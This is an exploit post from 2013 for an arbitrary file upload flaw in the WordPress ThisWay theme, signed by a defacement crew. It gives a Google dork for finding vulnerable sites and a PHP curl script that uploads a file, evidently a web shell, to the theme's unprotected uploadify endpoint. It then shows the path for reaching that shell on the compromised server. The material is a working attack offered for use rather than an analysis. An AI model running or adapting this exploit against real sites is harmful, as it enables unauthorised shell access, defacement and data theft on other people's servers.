Home / exploits WordPress ThisWay Shell Upload
Posted on 05 November 2013
_________ .___ _____ _____ _______ _________ __ .__ / _____/__ __ ____ __| _// | | ____ ___.__. / _ __ __________ \_ ___ _________________ ________________ _/ |_|__| ____ ____ \_____ | | / / __ |/ | |_/ < | |/ / / /_ | | \___ / / / / _ \_ __ \____ / _ \_ __ \__ \ __ |/ _ / / | / | / /_/ / ^ / | \___ / Y \_/ | // / \___( <_> ) | / |_> > <_> ) | // __ | | | ( <_> ) | /_______ /____/|___| /\____ \____ ||___| / ____\____|__ /\_____ /____//_____ \______ /\____/|__| | __/ \____/|__| (____ /__| |__|\____/|___| / / / / |__| // / / / / |__| / / ######################################################################################## #Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability #Author: Bet0 #Google Dork: inurl:"/wp-content/themes/ThisWay/" #Date:1 November 2013 #Vendor Homepage: http://themeforest.net/ #Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/ #Tested on: Windows 7 ######################################################################################## [+]EXPLOIT <?php $uploadfile="upl.php"; $ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [+]SHELL ACCSES http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php [+]Twitter: https://twitter.com/Defacto_ID [+]REGARDS To: All member Sund4nyM0uz Corporation,Explore Crew, Trackc0de Crew, Malang Cyber Crew, Indonesian Coder, HN-Community, and My Girl :*
